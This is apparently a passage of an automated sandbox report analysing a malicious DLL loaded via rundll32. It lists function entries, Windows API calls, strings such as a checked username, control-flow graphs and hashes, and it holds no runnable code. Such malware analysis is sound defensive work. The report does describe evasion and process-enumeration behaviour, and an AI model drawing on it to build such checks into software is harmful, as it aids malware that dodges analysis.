                                                                  • Instruction Fuzzy Hash: CD21D3765087C186E760CF14F49478BBBA4F3C4398FA08229E2D947AA8DB7DD589CF40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                  • String ID: o
                                                                  • API String ID: 2718687846-252678980
                                                                  • Opcode ID: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
                                                                  • Instruction ID: 5b00cb16619b98e728d725e281d91af7f350b4bf3ab7bb63d383620dd138e538
                                                                  • Opcode Fuzzy Hash: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
                                                                  • Instruction Fuzzy Hash: FC115A3E908B01C6D7709B14E0943AAB7B4F78C798F540225E68D47B68EBBDC680CF00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 354 1fb3ab7b0c4-1fb3ab7b0f3 call 1fb3ab7bf4c 357 1fb3ab7b0f9-1fb3ab7b13e call 1fb3ab7ae1c NtOpenKey 354->357 358 1fb3ab7b0f5-1fb3ab7b0f7 354->358 362 1fb3ab7b140 357->362 363 1fb3ab7b148 357->363 359 1fb3ab7b14d-1fb3ab7b151 358->359 362->363 363->359
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID: 0$@
                                                                  • API String ID: 71445658-1545510068
                                                                  • Opcode ID: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
                                                                  • Instruction ID: 83c15a0bc45c4688808c987eaecd517ac5ddec0bdb01a051f7295fef37bd72dd
                                                                  • Opcode Fuzzy Hash: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
                                                                  • Instruction Fuzzy Hash: 62014F7A6186C186D760DF10E48039BBBA8F7C43C4FA04125E6CA86A69EB7DC555CF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NameUserwsprintf
                                                                  • String ID: alfons
                                                                  • API String ID: 54179028-1092396413
                                                                  • Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                                                                  • Instruction ID: adc20849eab4a9a05a21b0be8a7ee639f2181a94058c279aac11d69e2931875e
                                                                  • Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
                                                                  • Instruction Fuzzy Hash: 38F01C7DA6868392EB50AB14F8C03F9A329FB98784FE00031A14D46994EF7DD24ADB41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
                                                                  • Instruction ID: 5b21f9238487bf9fe6a36a0a5a265297d365cced72f719a6047ada2b53423bd9
                                                                  • Opcode Fuzzy Hash: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
                                                                  • Instruction Fuzzy Hash: 31413D3E619A8186D750DB15E4803AEB7A4FBC4784F605025FA8E83B69EF7ED584CF01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DirectorySystem
                                                                  • String ID:
                                                                  • API String ID: 2188284642-0
                                                                  • Opcode ID: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
                                                                  • Instruction ID: 0a77885bd019b44a25d9b3af705b311519e54c4b9ad0b4258c33eb097a7ab1f7
                                                                  • Opcode Fuzzy Hash: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
                                                                  • Instruction Fuzzy Hash: 0431033D95CA82C5E6B09B14E4C43FA6368FB84754F600239E69A426D9FF6FD5448702
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID: @
                                                                  • API String ID: 2167126740-2766056989
                                                                  • Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                                                                  • Instruction ID: 24001611ebe67e6196830ec87dbf3770f94d1c009a446fe7e6bde4feb8168320
                                                                  • Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
                                                                  • Instruction Fuzzy Hash: 7DE0307A628780C2D7409F54E49474BB764FB847B4F901315FAA947BD8CBBDC1148F00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateFileMemoryReadVirtual
                                                                  • String ID:
                                                                  • API String ID: 1637922817-0
                                                                  • Opcode ID: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
                                                                  • Instruction ID: 133b5e123b823ca29eeceeda9361a497d82eebcdbca0bb9d3cb73225a94c4888
                                                                  • Opcode Fuzzy Hash: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
                                                                  • Instruction Fuzzy Hash: DF210C3A618BC49AD760CB64E49435AB7A5F388790F908425EB8D83B68EFBDC554CF00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFileInitStringUnicode
                                                                  • String ID:
                                                                  • API String ID: 2498367268-0
                                                                  • Opcode ID: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
                                                                  • Instruction ID: 921612a3850f40225439326a124dad341a595c5307d66c0f8f75dc9cc5551e84
                                                                  • Opcode Fuzzy Hash: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
                                                                  • Instruction Fuzzy Hash: 1601ED3E64C681C3E630DB15E48065AB7B4F789788F600125EACC47A59EB7ED651CF00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
                                                                  • Instruction ID: 3df06d7478c0b3193587b2b23006b7580df2b3c2b632ef9972a1373ce7edd8e1
                                                                  • Opcode Fuzzy Hash: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
                                                                  • Instruction Fuzzy Hash: 72F0C87D55C64282E3309B10E48079A7764FB843B8F200320F5ED46AD5EB7ED2448F01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
                                                                  • Instruction ID: 58548e05866c76b0b753b544f6a079cc38874f69dcc32f1ece4469ab07646d95
                                                                  • Opcode Fuzzy Hash: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
                                                                  • Instruction Fuzzy Hash: ABF0E73AA1CBD187E360CB64F48474BB7A4F384394F604125E6C982F68EBBDC1948F40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 3963845541-0
                                                                  • Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                                                                  • Instruction ID: e42f8bbd0cd5a415cd67f3b89a5fc0cf14f34a8b4eb9685bf3ef10d76b88951c
                                                                  • Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
                                                                  • Instruction Fuzzy Hash: 59E0E679508B8182D7609B54E4847997774F3853B4FA44315E6B941AF4DF7DC189CF01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 107 180070044-1800700c2 108 1800700c7-1800700c9 107->108 109 1800700cd-1800700d8 108->109 109->109 110 1800700da-1800700dd 109->110 110->108 111 1800700df-1800700e3 110->111 112 1800701a6 111->112 113 1800700e9-1800700fa 111->113 115 1800701aa-1800701fc call 1800704f0 * 3 VirtualAlloc 112->115 114 1800700fd-18007010a 113->114 116 180070118-18007011d 114->116 117 18007010c-180070116 114->117 119 180070120-18007012a 116->119 117->116 117->117 119->119 121 18007012c-18007012f 119->121 123 180070131-180070139 121->123 124 18007018f-180070195 121->124 128 18007013c-18007014a 123->128 124->114 127 18007019b-18007019e 124->127 127->115 130 1800701a0-1800701a4 128->130 131 18007014c-180070156 128->131 130->115 131->131 132 180070158-18007015b 131->132 132->130 133 18007015d-18007016a 132->133 134 180070171-180070179 133->134 135 18007016c 133->135 136 180070180-180070184 134->136 137 18007017b 134->137 135->134 136->124 138 180070186-18007018d 136->138 137->136 138->128
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: )RxR$MN(U$S5Xl$k$pOdy$w
                                                                  • API String ID: 4275171209-2056616801
                                                                  • Opcode ID: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
                                                                  • Instruction ID: 4deb1cea13ac9b666c555f1b3f310a4baaf57dd73fee47670c94506e3a1fa1fc
                                                                  • Opcode Fuzzy Hash: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
                                                                  • Instruction Fuzzy Hash: 78413772705648C6EBA68F21E004B9E7BB1F348BC8FA4C115EE4947B89CB7EC649C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 139 1fb3ab733ac-1fb3ab73402 call 1fb3ab730d0 142 1fb3ab7340b-1fb3ab7341b call 1fb3ab73250 139->142 143 1fb3ab73404-1fb3ab73406 139->143 147 1fb3ab73421-1fb3ab7345c call 1fb3ab7bc64 call 1fb3ab7bb2c call 1fb3ab76b9c * 2 call 1fb3ab77588 142->147 148 1fb3ab7371c 142->148 144 1fb3ab7371e-1fb3ab73725 143->144 159 1fb3ab73712-1fb3ab73717 call 1fb3ab77b40 147->159 160 1fb3ab73462-1fb3ab7349f call 1fb3ab7bc64 call 1fb3ab7bb2c call 1fb3ab76b9c call 1fb3ab77504 147->160 148->144 159->148 170 1fb3ab734a1-1fb3ab734a3 160->170 171 1fb3ab734a8-1fb3ab734bf call 1fb3ab7ae78 160->171 170->144 174 1fb3ab734c1-1fb3ab734ce 171->174 175 1fb3ab734d0-1fb3ab734d8 171->175 176 1fb3ab734dd-1fb3ab734f7 wsprintfW 174->176 175->176 177 1fb3ab734fd-1fb3ab73514 call 1fb3ab7ae78 176->177 178 1fb3ab73597-1fb3ab735ae call 1fb3ab7ae78 176->178 185 1fb3ab73516-1fb3ab73523 177->185 186 1fb3ab73525-1fb3ab7352d 177->186 183 1fb3ab735b0-1fb3ab735bd 178->183 184 1fb3ab735bf-1fb3ab735c7 178->184 187 1fb3ab735cc-1fb3ab735f6 wsprintfW call 1fb3ab7ae78 183->187 184->187 188 1fb3ab73532-1fb3ab73561 wsprintfW call 1fb3ab7ae78 185->188 186->188 193 1fb3ab735f8-1fb3ab73605 187->193 194 1fb3ab73607-1fb3ab7360f 187->194 195 1fb3ab73572-1fb3ab7357a 188->195 196 1fb3ab73563-1fb3ab73570 188->196 198 1fb3ab73614-1fb3ab73639 wsprintfW 193->198 194->198 197 1fb3ab7357f-1fb3ab73592 wsprintfW 195->197 196->197 199 1fb3ab7363f-1fb3ab736aa call 1fb3ab73728 call 1fb3ab77b40 * 3 call 1fb3ab73c2c call 1fb3ab73a24 call 1fb3ab7ad34 197->199 198->199 214 1fb3ab736ac-1fb3ab736c5 call 1fb3ab7ba98 199->214 215 1fb3ab73703-1fb3ab7370b ExitProcess 199->215 218 1fb3ab736ea-1fb3ab736f4 call 1fb3ab7b400 214->218 219 1fb3ab736c7-1fb3ab736e5 call 1fb3ab7ba98 * 2 214->219 215->159 223 1fb3ab736f9-1fb3ab736fe call 1fb3ab77b40 218->223 219->218 223->215
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
                                                                  • Instruction ID: 96aad39a2267727e0060e6dd7d2f80888f5da6cd310884b1ea9d12524734d23b
                                                                  • Opcode Fuzzy Hash: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
                                                                  • Instruction Fuzzy Hash: 5891343D65DB8695EA50DB14F4D03EAB368FF84380F600035E68E426A9FFBAD545CB12
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
                                                                  • Instruction ID: 2dc8a80f24ce7fb32ad7ecbba018f9b1ed19a7e6ad5dfc0d06004ce61af44bc4
                                                                  • Opcode Fuzzy Hash: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
                                                                  • Instruction Fuzzy Hash: 6851663D64CB8182E750DB18F4903AAB764F7C57A4F200225EAD947BE8EFBAD444CB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
                                                                  • Instruction ID: 9b4f0520e9bef21039ff8ca5616d7f291f6d4329e34d162e1445376ecdb4b353
                                                                  • Opcode Fuzzy Hash: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
                                                                  • Instruction Fuzzy Hash: AE41403D98C68385F6605B64D4C53F976ACBF44368F300335E4AA466D5FBBAE5048B23
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 420147892-0
                                                                  • Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                                                                  • Instruction ID: ef54ab91179a74bbda44cbc2c78dd8a87b0c06a922f005479bd6c45b45fad237
                                                                  • Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
                                                                  • Instruction Fuzzy Hash: FE01623EA5C681C3E7A0CB15E48436AB768FBC8788F540225A58E86668EF3CD545CB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: S5Xl
                                                                  • API String ID: 4275171209-3963265540
                                                                  • Opcode ID: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
                                                                  • Instruction ID: 8627bea6adcabeb617a02013d3036f8ce64dc83beb87997f1cd45eda72222d63
                                                                  • Opcode Fuzzy Hash: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
                                                                  • Instruction Fuzzy Hash: B63146733116A886CB56CF75A548FEC3BAAF718BC8F5281268E4D07B55DE39C11AC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 2922976086-0
                                                                  • Opcode ID: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
                                                                  • Instruction ID: ca8f21d2fc03cd20ce50ad8eab8437923208b666bc88fabfc3a9161fbfdd11df
                                                                  • Opcode Fuzzy Hash: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
                                                                  • Instruction Fuzzy Hash: 3811FE3A55C781C7E760CB14F4847ABF7A4F7C4354F604525E68982A98EBBDD548CF01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Volume$Find$CloseFirstInformation
                                                                  • String ID:
                                                                  • API String ID: 586543143-0
                                                                  • Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                                                                  • Instruction ID: f7bbd442598c3f86f436ba9d5db9db5147e9c90ebc7f2463605873eb16f778f8
                                                                  • Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
                                                                  • Instruction Fuzzy Hash: 91111C3E55CB8186E7609B54F4C43EAB3A8F784350FA00236E29942AE8EF7DD549CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEventHandleMutexRelease
                                                                  • String ID:
                                                                  • API String ID: 3391745777-0
                                                                  • Opcode ID: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
                                                                  • Instruction ID: a73f9458537115b9fa03c3464298297fce7e5a1901333e0f1684d45c9c471196
                                                                  • Opcode Fuzzy Hash: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
                                                                  • Instruction Fuzzy Hash: CEF04C3C98978281E6909B19E8943A4A77CBF88B88F640125D44A42275EF7DA455C616
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: S5Xl
                                                                  • API String ID: 4275171209-3963265540
                                                                  • Opcode ID: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
                                                                  • Instruction ID: cfc6a34ce132622bae8ceb4dc72cd21c5819cecda536a8dbeac765b14806de91
                                                                  • Opcode Fuzzy Hash: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
                                                                  • Instruction Fuzzy Hash: 691106723217A885CE61CF35A54CFA82BA9F71CFC8F1691158E4D13B01DE39C019C300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CurrentFormatFreeMemoryPathUserVirtual
                                                                  • String ID:
                                                                  • API String ID: 2593304397-0
                                                                  • Opcode ID: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
                                                                  • Instruction ID: c20a293f8c99b864851af792473970c71e4d7cc96b0413037156c47252766f77
                                                                  • Opcode Fuzzy Hash: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
                                                                  • Instruction Fuzzy Hash: 8C21363EA5C68391EA609B11E4D03FA6368FBD4384F601535A6CE426E9FF6ED5448B02
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
                                                                  • Instruction ID: ef256bddb079c5ae259b8b4714ab1ed82fa3864057e49dc814eb40cad9b64047
                                                                  • Opcode Fuzzy Hash: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
                                                                  • Instruction Fuzzy Hash: B1E0923DE7C69287E3A08B34E8803BA6A58F783350F700530A9D2811D4EB69D0949B02
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
